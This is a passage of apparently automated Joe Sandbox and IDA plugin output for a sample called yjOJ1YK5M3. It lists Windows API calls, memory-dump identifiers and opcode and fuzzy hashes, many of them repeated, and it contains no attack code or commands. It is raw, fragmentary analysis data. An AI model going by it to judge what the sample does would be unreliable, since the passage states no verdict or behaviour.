                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: 95fa9c8404b692e05ee789fc5b05043fc82cfc20519c5b1628b06d426ed5352c
                                        • Instruction ID: 1586b432ea45d31d1c25fee7a50dee08d8ae35164b056f193bafc64187be0d95
                                        • Opcode Fuzzy Hash: 95fa9c8404b692e05ee789fc5b05043fc82cfc20519c5b1628b06d426ed5352c
                                        • Instruction Fuzzy Hash: D0A001966BD112BC3A0872617E06C7B021DC4DABA63318A1AF842C5982A8815AA61431
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: 125a0af44fe3f218a514acfe21d30877f82a7c57a1ef1d05ab8c540986b6d660
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: b57a7068d83dafe8d0e56d32595f63a9b1bdd2dff2a7e00137e2fd255992f69e
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: f74516db5a5103b658d610fafbcebc5025618c54f4be19b955388ef6570275a8
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: 9a7b85dc3dede5f0de905b4420cc481668a2a05f47f9620da2656a87568d1430
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294B3B
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: Pl)uDK)
                                        • API String ID: 1269201914-1997787021
                                        • Opcode ID: bfb46d0963aab7af87a2a3c0b1d0542f10c809060d56be1879ca16086433e056
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294B3B
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: Pl)uDK)
                                        • API String ID: 1269201914-1997787021
                                        • Opcode ID: 358e10b33d1dd5fabe12242eff854a7482b8c2930359db4be6518d17f363a3e5
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294B3B
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: Pl)uDK)
                                        • API String ID: 1269201914-1997787021
                                        • Opcode ID: 22fc639b4fc0b2a7c84b8f9c4d2d9eee4915bc2ecf5be65d633ed8850e66f621
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294B3B
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: Pl)uDK)
                                        • API String ID: 1269201914-1997787021
                                        • Opcode ID: 40f846b8d78a0d8e5181aa315301bdbb0b563af2bf8af79d767b875ffff010dd
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294B3B
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: Pl)uDK)
                                        • API String ID: 1269201914-1997787021
                                        • Opcode ID: 6560ed53c14cc3d9160a400ab88dc92ed481d97532fb04ba1e7a6fc9c26dbc16
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294B3B
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: Pl)uDK)
                                        • API String ID: 1269201914-1997787021
                                        • Opcode ID: 667fb04e2ce1f96510f94e06ca78e6fc275fd7eef4a4d890cc52188b456b56ac
                                        APIs
                                        • SetFilePointer.KERNELBASE(000000FF,?,?,?,?,00000000,?,00000000,0027E3B1,?,?,00000000,?,?,0027CC21,?), ref: 0027E55F
                                        • GetLastError.KERNEL32 ref: 0027E56E
                                        Similarity
                                        • API ID: ErrorFileLastPointer
                                        • String ID:
                                        • API String ID: 2976181284-0
                                        • Opcode ID: 955acbd7924a6119de24b0b792794cd00f719490085144f98a4359df83c970b1
                                        APIs
                                        • FlushFileBuffers.KERNEL32(?), ref: 0027E78C
                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 0027E840
                                        Similarity
                                        • API ID: File$BuffersFlushTime
                                        • String ID:
                                        • API String ID: 1392018926-0
                                        • Opcode ID: 71eb32f4df11126d3d7e47cf4b147291d88a7168a40290c10cd7ed107e44b4a6
                                        APIs
                                        • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 0027E897
                                        • GetLastError.KERNEL32 ref: 0027E8A4
                                        Similarity
                                        • API ID: ErrorFileLastPointer
                                        • String ID:
                                        • API String ID: 2976181284-0
                                        • Opcode ID: 44dc67b295f4ffa85333a45bcb3a9a521c79581e6ba24a777f7dbbc4fa79331c
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 00271CE9
                                        • GetDlgItem.USER32(?,?), ref: 00271D01
                                          • Part of subcall function 002714A7: _wcslen.LIBCMT ref: 002714B8
                                        Similarity
                                        • API ID: H_prolog3_Item_wcslen
                                        • String ID:
                                        • API String ID: 896027972-0
                                        • Opcode ID: 99293a5d7c3863103c36f1613b094f9bdb2ce2c2c293d81ba6a03e1679493ba1
                                        APIs
                                        • GetCurrentProcess.KERNEL32(02000000,?,00000002,00000002,?,002876EA,00280B6F), ref: 002876B4
                                        • GetProcessAffinityMask.KERNEL32(00000000,?,002876EA), ref: 002876BB
                                        Similarity
                                        • API ID: Process$AffinityCurrentMask
                                        • String ID:
                                        • API String ID: 1231390398-0
                                        APIs
                                        • GdiplusShutdown.GDIPLUS(?,?,?,?,002A9B73,000000FF), ref: 0028F578
                                        • CoUninitialize.COMBASE(?,?,?,?,002A9B73,000000FF), ref: 0028F57D
                                        Similarity
                                        • API ID: GdiplusShutdownUninitialize
                                        • String ID:
                                        • API String ID: 3856339756-0
                                        APIs
                                        • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0028E86A
                                        • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0028E871
                                        Similarity
                                        • API ID: BitmapCreateFromGdipStream
                                        • String ID:
                                        • API String ID: 1918208029-0
                                        APIs
                                        Similarity
                                        • API ID: ItemShowWindow
                                        • String ID:
                                        • API String ID: 3351165006-0
                                        APIs
                                        • GetDlgItem.USER32(?,?), ref: 00271CD2
                                        • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00271CD9
                                        Similarity
                                        • API ID: CallbackDispatcherItemUser
                                        • String ID:
                                        • API String ID: 4250310104-0
                                        APIs
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID:
                                        • API String ID: 431132790-0
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 002720B7
                                          • Part of subcall function 002780EC: __EH_prolog3.LIBCMT ref: 002780F3
                                          • Part of subcall function 00282815: __EH_prolog3.LIBCMT ref: 0028281C
                                          • Part of subcall function 002776E7: __EH_prolog3.LIBCMT ref: 002776EE
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID:
                                        • API String ID: 431132790-0
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 0027B3E8
                                          • Part of subcall function 0027F711: FindClose.KERNELBASE(00000000,000000FF,00000049,00000049,?,?,0027A684,?,?,00000000,?,?,?,?,?,?), ref: 0027F739
                                        Similarity
                                        • API ID: CloseFindH_prolog3_
                                        • String ID:
                                        • API String ID: 2672038326-0
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 00272C37
                                          • Part of subcall function 0028880E: __EH_prolog3.LIBCMT ref: 00288815
                                        Similarity
                                        • API ID: H_prolog3H_prolog3_
                                        • String ID:
                                        • API String ID: 3355343447-0
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 002776EE
                                          • Part of subcall function 00284F2B: __EH_prolog3.LIBCMT ref: 00284F32
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID:
                                        • API String ID: 431132790-0
                                        APIs
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID:
                                        • API String ID: 431132790-0
                                        APIs
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID:
                                        • API String ID: 431132790-0
                                        APIs
                                        Similarity
                                        • API ID: H_prolog3_
                                        • String ID:
                                        • API String ID: 2427045233-0
                                        APIs
                                        Similarity
                                        • API ID: H_prolog3_
                                        • String ID:
                                        • API String ID: 2427045233-0
                                        APIs
                                          • Part of subcall function 002A1DE6: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,002A00BA,00000001,00000364,?,00296C16,?,?,?,?,?,00295269,0029535E), ref: 002A1E27
                                        • _free.LIBCMT ref: 002A3195
                                        Similarity
                                        • API ID: AllocateHeap_free
                                        • String ID:
                                        • API String ID: 614378929-0
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 0028281C
                                          • Part of subcall function 002780EC: __EH_prolog3.LIBCMT ref: 002780F3
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID:
                                        • API String ID: 431132790-0
                                        • Opcode ID: f885ff5aa59cb1c22c233405b24f693a2f4de212bc6ac6c2510b28eb2b625a71
                                        • Instruction ID: 1ef34f3bca611f899189d0f27e97ad64dce3a64984509dbf34d1d1692809e2b8
                                        • Opcode Fuzzy Hash: f885ff5aa59cb1c22c233405b24f693a2f4de212bc6ac6c2510b28eb2b625a71
                                        • Instruction Fuzzy Hash: 7001D271E35750CAEF11FBB8860539EBAE45F41300F10806DE44997382DE748B18DF61
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3_
                                        • String ID:
                                        • API String ID: 2427045233-0
                                        • Opcode ID: 7c08f6260f5cce71416e5ef3975e5c61b54b39e2b9e373d64c89d2e7cd68135e
                                        • Instruction ID: 8d191ba0873802aa25af9fe34155517322902169b228743f4331b61abbdde58f
                                        • Opcode Fuzzy Hash: 7c08f6260f5cce71416e5ef3975e5c61b54b39e2b9e373d64c89d2e7cd68135e
                                        • Instruction Fuzzy Hash: 90016D75961208EBDF01FBE4C886BDEB7BCAF14304F544065F504A6182CA389B69CF71
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,002A00BA,00000001,00000364,?,00296C16,?,?,?,?,?,00295269,0029535E), ref: 002A1E27
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 8723cb690591ae14e409c599d94a114339db5f915bdac415be67e2565128f108
                                        • Instruction ID: 6dd1f6867ff13c0a2efeb7271383901a0cccf5303b3ef051938a3aa23e119168
                                        • Opcode Fuzzy Hash: 8723cb690591ae14e409c599d94a114339db5f915bdac415be67e2565128f108
                                        • Instruction Fuzzy Hash: 5BF0B43263512567EF215F62AE05F5B7748EF83770F254061FC08AA190CEA0D93086E4
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID:
                                        • API String ID: 431132790-0
                                        • Opcode ID: 6790aceb761e1d6384c5a9e96842ec0fe969cda60536d56885e23cfdefdc2a71
                                        • Instruction ID: b685b47a7fc0829b3ee21f1406de5214be991e9b2d4b1430dc7ef33220e232c3
                                        • Opcode Fuzzy Hash: 6790aceb761e1d6384c5a9e96842ec0fe969cda60536d56885e23cfdefdc2a71
                                        • Instruction Fuzzy Hash: ADF0C2B06A0710ABDA32EB258C13F8BBBD8AB85B00F404019F35C671C2DBB023218B59
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000,0029535E,?,?,00296C16,?,?,?,?,?,00295269,0029535E,?,?,?,?), ref: 002A0440
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: ee286a33ce3b248e5c6239afe1d0c650029f5ed31de1cb9afc5b27591b7dc1f4
                                        • Instruction ID: 67b03dbaca891ea5c8158aec90e9ed3b37cca32cea43defac58c327b4007945e
                                        • Opcode Fuzzy Hash: ee286a33ce3b248e5c6239afe1d0c650029f5ed31de1cb9afc5b27591b7dc1f4
                                        • Instruction Fuzzy Hash: D1E0653113521297EA612B65AC85B5B7A48FF4B3A0F294120EE4896191CFA1DC2085A2
                                        APIs
                                          • Part of subcall function 0027F826: __EH_prolog3_GS.LIBCMT ref: 0027F830
                                          • Part of subcall function 0027F826: FindFirstFileW.KERNELBASE(?,?,00000274,0027F733,000000FF,00000049,00000049,?,?,0027A684,?,?,00000000,?,?,?), ref: 0027F859
                                          • Part of subcall function 0027F826: FindFirstFileW.KERNEL32(?,?,?,?,?,0027D303,?,?,?,?,?,?,?,D946AC94,00000049), ref: 0027F8A4
                                          • Part of subcall function 0027F826: GetLastError.KERNEL32(?,?,?,0027D303,?,?,?,?,?,?,?,D946AC94,00000049,?,00000000), ref: 0027F902
                                        • FindClose.KERNELBASE(00000000,000000FF,00000049,00000049,?,?,0027A684,?,?,00000000,?,?,?,?,?,?), ref: 0027F739
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Find$FileFirst$CloseErrorH_prolog3_Last
                                        • String ID:
                                        • API String ID: 765066492-0
                                        • Opcode ID: 309e164cb00a41ee6ff000ed6849875090671910127a476b08eacd0217df5b8a
                                        • Instruction ID: 77941b4daee4bb1973eec97967ebda99f2e07df024b9d7e96ed3fdf5ddd9e2fb
                                        • Opcode Fuzzy Hash: 309e164cb00a41ee6ff000ed6849875090671910127a476b08eacd0217df5b8a
                                        • Instruction Fuzzy Hash: E7F0823501E760AECE616BA48904A8BBFD46F1B360F108B49F0FD121A2C2709465DB22
                                        APIs
                                        • SetThreadExecutionState.KERNEL32(00000001), ref: 0028742D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ExecutionStateThread
                                        • String ID:
                                        • API String ID: 2211380416-0
                                        • Opcode ID: a4b3a3469bb8d399c44204b05f816f8513371de7608c8befeb0e8872040f4bde
                                        • Instruction ID: 14e351a4b467cfccf4ab411245c3477f8f2fdeec6b8b219d6e0e20201c0f8650
                                        • Opcode Fuzzy Hash: a4b3a3469bb8d399c44204b05f816f8513371de7608c8befeb0e8872040f4bde
                                        • Instruction Fuzzy Hash: A1D0C20463A12022EA113B2428497FD190E4F82315F098025B408631C39E9408AA97AA
                                        APIs
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00271206
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task
                                        • String ID:
                                        • API String ID: 118556049-0
                                        • Opcode ID: b6dbc1ff7d9b6923f3e65d4a1a5089bb0344b4586f9250eb3f5b27e450492f1d
                                        • Instruction ID: 8b61af632b292fbaeb3f7b2abde11a5b17b4acbe74f84b4c9708c6b79fdb7cb5
                                        • Opcode Fuzzy Hash: b6dbc1ff7d9b6923f3e65d4a1a5089bb0344b4586f9250eb3f5b27e450492f1d
                                        • Instruction Fuzzy Hash: 53D05E767226134E8B2DEF38C46682E76A46E90305320822DF42ECA682DF31CC35CB59
                                        APIs
                                        • GdipAlloc.GDIPLUS(00000010), ref: 0028EB0C
                                          • Part of subcall function 0028E849: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0028E86A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Gdip$AllocBitmapCreateFromStream
                                        • String ID:
                                        • API String ID: 1915507550-0
                                        • Opcode ID: 40d26e3062f3a0a4d923ad9eb1023a0fc0ac8bf0375a6db8f64136e7eac3b51d
                                        • Instruction ID: cdf120a81c994bd3f668c395bf66daee41db4ccc9a5998d4da7e2419aa1c5036
                                        • Opcode Fuzzy Hash: 40d26e3062f3a0a4d923ad9eb1023a0fc0ac8bf0375a6db8f64136e7eac3b51d
                                        • Instruction Fuzzy Hash: 13D0C93432120ABADF467F61CC1297E7A99EF00358F418525BD46951E1EAB1EA30ABA1
                                        APIs
                                        • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00294256
                                          • Part of subcall function 00290678: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00290689
                                          • Part of subcall function 00290678: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0029069A
                                          • Part of subcall function 00290678: IsDialogMessageW.USER32(00010414,?), ref: 002906AE
                                          • Part of subcall function 00290678: TranslateMessage.USER32(?), ref: 002906BC
                                          • Part of subcall function 00290678: DispatchMessageW.USER32(?), ref: 002906C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Message$DialogDispatchItemPeekSendTranslate
                                        • String ID:
                                        • API String ID: 897784432-0
                                        • Opcode ID: d99c110430eee003fd7f1fa07e58b7555c5dd427ce4f07c19e5832a249679588
                                        • Instruction ID: a199f97a6b2b7ad71a2e4d9809f8f37598e5a12d500ba96d26c6fe284736a24f
                                        • Opcode Fuzzy Hash: d99c110430eee003fd7f1fa07e58b7555c5dd427ce4f07c19e5832a249679588
                                        • Instruction Fuzzy Hash: 59D09E36155300AEDB122B51DE0AF0A7AE6BB88B04F404654B345340F1C662AE709F16
                                        APIs
                                          • Part of subcall function 00294DD5: RtlAcquireSRWLockExclusive.NTDLL ref: 00294DF2
                                        • DloadProtectSection.DELAYIMP ref: 00294D54
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AcquireDloadExclusiveLockProtectSection
                                        • String ID:
                                        • API String ID: 3680172570-0
                                        • Opcode ID: 9fe1fedbf8a658d8d7b0e4ba7bf881bdaee93454b164d4bcf8339d1965c4f4cd
                                        • Instruction ID: 810f380bd881dfea3344716b09bec800f8f373eebc5e9caefd2218e52bc25886
                                        • Opcode Fuzzy Hash: 9fe1fedbf8a658d8d7b0e4ba7bf881bdaee93454b164d4bcf8339d1965c4f4cd
                                        • Instruction Fuzzy Hash: A3D0123C1307719ECF15BF24AC4EF142390BB05B14F800646F253855B8DFB8A4B3AAA1
                                        APIs
                                        • GetFileType.KERNELBASE(000000FF,0027E052,?,?,?,00000000,0027E5D2,?,?,00000000,?,00000000), ref: 0027E15E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
